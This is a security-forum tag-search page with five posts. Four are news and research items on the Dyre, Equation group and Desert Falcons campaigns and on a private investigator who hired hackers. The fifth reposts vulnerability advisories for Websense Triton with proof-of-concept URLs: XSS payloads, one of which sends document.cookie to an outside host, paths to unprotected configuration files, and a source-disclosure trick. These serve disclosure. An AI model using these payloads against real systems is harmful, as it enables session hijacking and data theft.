Jump to content

Search the Community

Showing results for tags 'victims'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 5 results

  1. IBM has unearthed evidence of an international cybercrime operation that has plundered more than $1 million from the corporate accounts of U.S. businesses. IBM has dubbed the operation 'The Dyre Wolf' after the Dyre malware at the center of the scheme. In October, US-CERT warned the malware was being used in spear-phishing campaigns to steal money from victims. In the campaign uncovered by IBM, attackers often used phony invoices laced with malware to snare their victims. While the file inside the attached zip file has an embedded PDF icon, it is actually an EXE or SCR file. Once opened, the victim is served the Upatre malware, which in turn downloads Dyre. "Once Dyre is loaded, Upatre removes itself as everything going forward is the result of the extensive functionality of Dyre itself," IBM noted in its report. "The password-stealing function of Dyre is the focus of this campaign, and ultimately what's used to directly transfer the money from the victim’s account. Dyre’s set up, much like Upatre’s, requires a number of steps to remain stealthy which helps it to spread itself to additional victims." Dyre also hooks into the victim's browsers (Internet Explorer, Chrome and Firefox) in order to steal credentials the user enters when they visit any of the targeted bank sites. In some cases, possibly due to the use of two-factor authentication, an extra dose of social engineering is used. "Once the infected victim tries to log in to one of the hundreds of bank websites for which Dyre is programmed to monitor, a new screen will appear instead of the corporate banking site," blogged John Kuhn, senior threat researcher at IBM. "The page will explain the site is experiencing issues and that the victim should call the number provided to get help logging in." According to IBM, when the victims call the number, they are greeted by a person with an American accent who states he works with the affected bank. After a brief conversation, the individual prompts the person to give their username and password and appears to verify it several times. The person may also ask for a token code, and ask to speak with a co-worker with similar access to the account and get information from them as well. "One of the many interesting things with this campaign is that the attackers are bold enough to use the same phone number for each website and know when victims will call and which bank to answer as," Kuhn blogged. This all results in successfully duping their victims into providing their company’s banking credentials, he added. After stealing the credentials, the attacker logs into the account and transfers large sums of money to various offshore accounts, IBM notes in its report. There have been reports of amounts ranging from $500,000 to $1 million USD being stolen via multiple, smaller transactions. As if that were not enough, the victim may also be hit with a distributed denial-of-service attack to cover the attacker's tracks. "The DDoS itself appears to be volumetric in nature," according to IBM's report. "Using reflection attacks with NTP and DNS, the Dyre Wolf operators are able to overwhelm any resource downstream. While they may have the potential to attack any external point in a business's network, the incidents we are tracking appear to focus on the company's website." Back in October, IBM's Trusteer team tracked a spike in the infection rate of Dyre, which is now believed by the firm to be in direct relationship with the development advancements within the Dyre project. In its current form, the malware appears to be owned and operated by a closed cyber-gang based in Eastern Europe, though the malware code itself could be operated by several connected teams attacking different geographies, IBM reported. "The sophistication and the level of deception that Dyre is now using is unprecedented when it comes to banking trojans," Kuhn told SecurityWeek. "The social engineering to defeat two-factor authentication shows the level of dedication and persistence to obtain their goal. Covering their tracks by initiating the denial-of-service attacks demonstrates how far they will go to ensure that the illicit transfer of money is hidden for as long as possible. The Dyre Wolf campaign is well funded, sophisticated and methodical in the theft off large sums of money." *This story was updated with additional information about the attack. Sursa: IBM: Cyber-gang Uses Dyre Malware to Loot Corporate Bank Accounts | SecurityWeek.Com
  2. Websense Content Gateway Error Message Cross Site Scripting ------------------------------------------------------------------------ Error messages of Websense Content Gateway are vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the error messages of Websense Content Gateway process user-controllable data insecurely, rendering these pages vulnerable to Cross-Site Scripting. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140916/error_messages_of_websense_content_gateway_are_vulnerable_to_cross_site_scripting.html An example of a vulnerable URL parameter is the admin_msg parameter. The value of this parameter is a Base64 encoded error message. It is possible to include HTML and scripting code in the message, which is used as-is in the resulting error page. An attacker can construct a specially crafted HTML response, that must be encoded using Base64 and appended to the following URL: https://<target>:8081/configure/ssl_ui/eva-config/client-cert-import_wsoem.html?admin_msg=<payload> An attacker must trick victims into opening the attacker's specially crafted link. This is for example possible by sending a victim a link in an email or instant message. Once a victim opens the specially crafted link, arbitrary client-side scripting code will be executed in the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes. Websense Reporting Cross Site Scripting ------------------------------------------------------------------------ Multiple Cross-Site Scripting vulnerabilities in Websense Reporting ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It has been found that Websense Reporting is affected by multiple Cross-Site Scripting issues. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location: http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140914/multiple_cross_site_scripting_vulnerabilities_in_websense_reporting.html One example of a vulnerable request parameter is the col. Its value is copied into the value of an HTML tag attribute; encapsulated in double quotation marks. The value echoed unmodified (without output encoding) in the application's response. This vulnerability can be reproduced using the following steps: - login into Admin GUI; - open the proof of concept below; - hover over 'Risk Class' in left corner. https://<target>:9443/explorer_wse/explorer_anon.exe?col=a86de%27onmouseover%3d%27alert%28document.cookie%29%27de90f&delAdmin=0&startDate=2014-07-31&endDate=2014-08-01 An attacker must trick victims into opening the attacker's specially crafted link. This is for example possible by sending a victim a link in an email or instant message. Once a victim opens the specially crafted link, arbitrary client-side scripting code will be executed in the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes. Websense Explorer Report Scheduler Cross Site Scripting ------------------------------------------------------------------------ Cross-Site Scripting vulnerability in Websense Explorer report scheduler ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the report scheduler of Websense Explorer is vulnerable to Cross-Site Scripting. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location: http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140911/cross_site_scripting_vulnerability_in_websense_explorer_report_scheduler.html An attacker can schedule a report containing a specially crafted ReportName that will trigger this vulnerability. An attacker can use this issue to inject malicious JavaScript code into the output of the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes. The following proof of concept can be used to demonstrate this issue: https://<target>:9443/Websense/cgi-bin/WsCgiExplorerSchedule.exe?pageAction=confirm&KeepTrend=&rangeAll=&emailListChain=%5Ehan.sahin%40securify.nl&SchedulePage=RunWeekly&DayOfWeek=Saturday&StartHour=21&StartMinute=30&emailList=%5Ehan.sahin%40securify.nl&EmailSubject=&EmailText=&ReportName=XSS<img+src%3dx+onerror%3dthis.src%3d'https%3a//www.securify.nl/%3fc%3d'%2bdocument.cookie>&outputFormat=.pdf&DateRangeType=AllDates Websense Data Security Cross Site Scripting ------------------------------------------------------------------------ Cross-Site Scripting vulnerability in Websense Data Security block page ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the Websense Data Security block page processes user-controllable data insecurely, rendering the block page is vulnerable to Cross-Site Scripting. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140910/cross_site_scripting_vulnerability_in_websense_data_security_block_page.html In order to exploit this vulnerability a valid ws-session is required. The payload has to be Base64 encoded, submitted to the block page via the ws-encdata URL parameter. For example, the following parameters can be submitted to the block page. ws-session=18446744072585574752&ws-userip=1.2.3.4--><iframe>0&ws-cat=76&ws-reason=1029 The above parameters must then be encoded with Base64 and appended to the following URL: http://<target>:15871/cgi-bin/moreBlockInfo.cgi?ws-encdata=<payload> An attacker must trick victims into opening the attacker's specially crafted link. This is for example possible by sending a victim a link in an email or instant message. Once a victim opens the specially crafted link, arbitrary client-side scripting code will be executed in the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes. Websense Explorer Missing Access Control ------------------------------------------------------------------------ Missing access control on Websense Explorer web folder ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that no access control is enforced on the explorer_wse path, which is exposed through the web server. An attacker can abuse this issue to download any file exposed by this path, including security reports and Websense Explorer configuration files. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140909/missing_access_control_on_websense_explorer_web_folder.html When a scheduled report has run, the report file is sent to recipients as an email attachment. Scheduled reports are also saved within explorer_wse, which is accessible for unauthenticated users. This vulnerability allows unauthenticated (proxy) users to download resources from the Websense reporting folder. Including confidential Web Security incidents reports Websense Explorer configuration files. For example: https://<target>:9443/explorer_wse/Other/1407992150/Securify_1407992150.xls https://<target>:9443/explorer_wse/websense.ini Websense Triton Source Code Disclosure ------------------------------------------------------------------------ Source code disclosure of Websense Triton JSP files via double quote character ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Websense Triton is affected by a source code disclosure vulnerability. By appending a double quote character after JSP URLs, Websense will return the source code of the JSP instead of executing the JSP. An attacker can use this issue to inspect parts of Websense's source code in order to gain more knowledge about Websense's internals. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location: http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ httpa://www.securify.nl/advisory/SFY20140907/source_code_disclosure_of_websense_triton_jsp_files_via_double_quote_character.html By appending a double quote character after JSP URLs, Websense will return the source code of the JSP instead of executing the JSP. For example: https://<target>:9443/triton/login/pages/certificateDone.jsp%22 Information disclosure vulnerabilities aid attackers trying to compromise the web application.
  3. A New York City-based private investigator has pled guilty to one charge of conspiracy to commit computer hacking, which carries a maximum sentence of five years. Eric Saldarriaga allegedly hired hackers to access the email accounts of various victims, a Federal Bureau of Investigation (FBI) press release states. Saldarriaga allegedly had the hackers hand over login credentials, so he could access victims' accounts and review their communications. Manhattan U.S. Attorney Preet Bharara said in the release: “Eric Saldarriaga crossed the line as a private investigator by hiring hackers to unlawfully and secretly access over 60 e-mail accounts, including accounts belonging to people he was investigating.” Saldarriaga's victims allegedly included both people in whom his clients were interested as well as individuals in whom he had a personal interest. Source
  4. Table of contents 1. What is the Equation group?..........................................................................3 2. Why do you call them the “Equation” group?................................................3 3. What attack tools and malware does the*Equation group use? ..................4 4. What is DOUBLEFANTASY?.............................................................................6 5. What is EQUATIONDRUG? ..............................................................................8 6. What is GRAYFISH?.........................................................................................9 7. What is Fanny?............................................................................................. 12 8. What exploits does the Equation group*use?............................................. 14 9. How do victims get infected by EQUATION group malware?...................... 15 10. What is the most sophisticated thing about the EQUATION group? ......... 16 11. Have you observed any artifacts indicating who is behind the*EQUATION*group?.................................................................................. 19 12. How many victims are there?...................................................................... 20 13. Have you seen any non-Windows malware from the Equation group?..... 22 14. What C&C infrastructure do the Equation group implants use? ............... 23 15. How do victims get selected for infection by the EQUATION group?......... 23 16. What kind of encryption algorithms are*used by the EQUATION group?... 27 17. How does the EQUATION group’s attack platforms compare with Regin?................................................................................... 30 18. How did you discover this malware? .......................................................... 31 Indicators of compromise (“one of each”) ......................................................... 32 Read more here: http://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf
  5. A cyber mercenary group, codenamed Desert Falcons, has infected thousands of government departments and businesses with malware, according to Kaspersky Lab. The security firm revealed the campaign at its Security Analyst Summit, revealing that it has already detected 3,000 confirmed Desert Falcons infections on Android and Windows devices. Victims include military and government bodies, media outlets, financial firms, research institutions, political activists, energy companies and physical security providers in Egypt, Palestine, Israel and Jordan. "The Desert Falcons cyber criminals are native Arabic speakers, and it is believed to be the first known Arab group to develop and run a full cyber espionage operation," read the report. "Desert Falcons began its operations in 2011, with the first infections taking place in 2013. The group became very active in late 2014/early 2015." The group is believed to have around 30 members split into three teams, and focuses mainly on stealing political and military intelligence. Kaspersky estimated that the hackers managed to steal more than one million files and documents containing sensitive information before being discovered. Dmitry Bestuzhev, security expert at Kaspersky Lab's Great team, said the Desert Falcons target victims with tailored campaigns which include a prolonged period of surveillance. "The individuals behind this threat are highly determined, active and with good technical, political and cultural insight," he explained. "Using only phishing emails, social engineering and homemade tools and backdoors, Desert Falcons was able to infect hundreds of sensitive and important victims." The campaign used a variety of malware types, and is one of the first to attempt to spread malware using Facebook chat. "The attackers created authentic Facebook accounts and then interacted with chosen victims through common Facebook pages until they had gained their trust. Then they sent Trojan files in the chat hidden as an image or similar," read the paper. "The Desert Falcons depends on two different backdoors to spy on victims. Both are homemade and are under continuous development. We were able to identify and collect more than 100 malware samples used by the Desert Falcons." The selection of tools gives the hackers a variety of powers, including key-logging and the ability to upload and download files to command and control servers owned by the group. Other powers include the ability to view information on all the .doc and .xls files on the victim's hard disk or connected USB devices, steal passwords and record audio files using infected machines. Kaspersky has managed to identify some Desert Falcon members, but expects the group to continue operating. "We were able to track and identify the full profile of some of the attackers, including Facebook and Twitter accounts, private blogs and websites," read the paper. "[but] we expect their operations to carry on developing more trojans and using more advanced techniques." Desert Falcons was one of many high-profile threat campaigns revealed during Kaspersky's security conference. Kaspersky researchers reported on Tuesday that they had uncovered a widespread Equation attack infecting hard drive operating systems with malware. The team also reported a Carbanak campaign which is believed to have stolen over $1bn from financial institutions. Source
×
×
  • Create New...